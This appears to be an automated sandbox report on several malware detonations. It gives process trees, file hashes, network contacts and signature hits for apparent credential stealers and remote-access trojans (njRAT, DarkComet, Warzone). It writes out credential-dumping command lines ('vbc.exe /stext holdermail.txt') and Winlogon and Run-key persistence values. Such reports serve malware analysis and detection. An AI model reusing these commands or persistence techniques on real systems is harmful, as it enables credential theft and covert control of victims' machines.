PID 2148 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2148 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2148 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 348 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 348 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 348 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 348 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 348 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 348 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 348 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2904 wrote to memory of 772 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 840 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2752 wrote to memory of 704 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe

"C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}

C:\Users\Admin\AppData\Roaming\wou\odm.exe

"C:\Users\Admin\AppData\Roaming\wou\odm.exe" kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\CXNWB

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

C:\Users\Admin\AppData\Roaming\wou\CXNWB

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.19.222.79:80 whatismyipaddress.com tcp
US 104.19.222.79:443 whatismyipaddress.com tcp
US 104.19.222.79:443 whatismyipaddress.com tcp
US 8.8.8.8:53 mail.jakartaalatkantor.com udp

Files

memory/2096-75-0x00000000001B0000-0x00000000001B2000-memory.dmp

memory/2148-74-0x0000000001F50000-0x0000000001F52000-memory.dmp

C:\Users\Admin\AppData\Roaming\wou\odm.exe

MD5 71d8f6d5dc35517275bc38ebcc815f9f
SHA1 cae4e8c730de5a01d30aabeb3e5cb2136090ed8d
SHA256 fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b
SHA512 4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59

C:\Users\Admin\AppData\Roaming\wou\zbackup- Copy.png

MD5 6285049d1e4f854943856164652da8d8
SHA1 f29c791ddb940be594bfb431eca7d4cb6d9e2688
SHA256 0aeb7e8a131b53991567db463519ea005d41ddd1f227a744d4f7066805ce684f
SHA512 2bb954a07f82c19b26d745ac19cd66e6eb82c525db0bd6e9e6880b0077465897d7fc49521d40361262c9dccdba4de6cead5b7d8dc09a9beaae2d668537097291

C:\Users\Admin\AppData\Roaming\wou\ait.ico

MD5 f6efac00916f3425d6079ae5a956df11
SHA1 3153abfe46186c1186882f67444c82c544615fb7
SHA256 1e866a8f06f125fa1c439f9cb00199be827e74b87eae12368bd1e2cf7ab28728
SHA512 0ba766d5816057941ad9afc80f7b20620b0120411357fe2b97ab0a425b32d4309396ed4866c8b23c92893ed68971c4a8a8c6f25ffa411ba0c70b602a63bd4743

C:\Users\Admin\AppData\Roaming\wou\rid.ico

MD5 a5f2dcee6a2a6047aa8fdde1ae2ce290
SHA1 7a082661c9a3431cd89ed4d9959178d60b9570f7
SHA256 7da78e767ff859970c8dae593b62f1366c2c651500eb280f0077a2245a9a8625
SHA512 e001300fc56f9bc8e9d61cb904ea6dec5ca447729015c9ff3dccc021f319fcce57ebaabb196a56f80d249dfbb88b4a0a273858cf14c7b9a93c10c9c8bc243d0a

C:\Users\Admin\AppData\Roaming\wou\CXNWB

MD5 9375872d82fbfe00eb4f6e608aa170d8
SHA1 b6d6f7059c025075141293cc0c1f80c1063ef75b
SHA256 a1b44347af8b2b2bf0409bb96e99f012035dc494ef44db409dbcd2bb726ff2e9
SHA512 f05e7f8c5d4edc6c41c0a2e4c63492a8578a4ae44e093396214fe422b90bd6e6d5fc98e1d8c4ee2253845a8b1a0bf202cd27450f641a8261d7f660b26162b863

memory/2752-109-0x0000000000400000-0x0000000000484000-memory.dmp

memory/2752-108-0x0000000000400000-0x0000000000484000-memory.dmp

memory/2752-107-0x0000000000400000-0x0000000000484000-memory.dmp

memory/2752-106-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2752-104-0x0000000000400000-0x0000000000484000-memory.dmp

memory/2752-102-0x0000000000400000-0x0000000000484000-memory.dmp

memory/2752-100-0x0000000000400000-0x0000000000484000-memory.dmp

memory/2752-98-0x0000000000400000-0x0000000000484000-memory.dmp

memory/772-119-0x0000000000090000-0x000000000015C000-memory.dmp

memory/772-117-0x0000000000090000-0x000000000015C000-memory.dmp

memory/772-116-0x0000000000090000-0x000000000015C000-memory.dmp

memory/772-113-0x0000000000090000-0x000000000015C000-memory.dmp

C:\Users\Admin\AppData\Roaming\wou\spd

MD5 098f6bcd4621d373cade4e832627b4f6
SHA1 a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
SHA256 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
SHA512 ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db27ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff

memory/840-121-0x0000000000400000-0x000000000041B000-memory.dmp

memory/840-122-0x0000000000400000-0x000000000041B000-memory.dmp

memory/840-124-0x0000000000400000-0x000000000041B000-memory.dmp

memory/840-125-0x0000000000400000-0x000000000041B000-memory.dmp

memory/704-129-0x0000000000400000-0x0000000000458000-memory.dmp

memory/704-127-0x0000000000400000-0x0000000000458000-memory.dmp

memory/704-126-0x0000000000400000-0x0000000000458000-memory.dmp

memory/704-136-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Analysis: behavioral13

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win7-20240903-en

Max time kernel

118s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe

"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

142s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

Signatures

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4788 set thread context of 4920 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\msiexec.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.dll

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4920 -ip 4920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 576

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/4920-0-0x0000000001200000-0x000000000122E000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win7-20241023-en

Max time kernel

145s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"

Signatures

Babylon RAT

trojan babylonrat

Babylonrat family

babylonrat

Darkcomet

trojan rat darkcomet

Darkcomet family

darkcomet

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\k4Xq51JTS0f2R98Z\\mPHb4MG6CWfE.exe\",explorer.exe" C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\k4Xq51JTS0f2R98Z\\IqJwOcR2PZK4.exe\",explorer.exe" C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Njrat family

njrat

WarzoneRat, AveMaria

rat infostealer warzonerat

Warzonerat family

warzonerat

njRAT/Bladabindi

trojan njrat

Warzone RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Disables Task Manager via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d790bed038373d95093d4db590b9997.exe C:\Windows\svehosts.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d790bed038373d95093d4db590b9997.exe C:\Windows\svehosts.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\office = "C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\office = "C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\2d790bed038373d95093d4db590b9997 = "\"C:\\Windows\\svehosts.exe\" .." C:\Windows\svehosts.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\2d790bed038373d95093d4db590b9997 = "\"C:\\Windows\\svehosts.exe\" .." C:\Windows\svehosts.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\svehosts.exe C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\excelsl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svehosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\VJ3Ebnlo2TU3rNhb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8AxPFTOJfcYALNsS.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LFd0FZIrV2OMeUao.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\hwoRSYStUwBqeomo.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aM6N0PLjqIvS2uz6.exe N/A
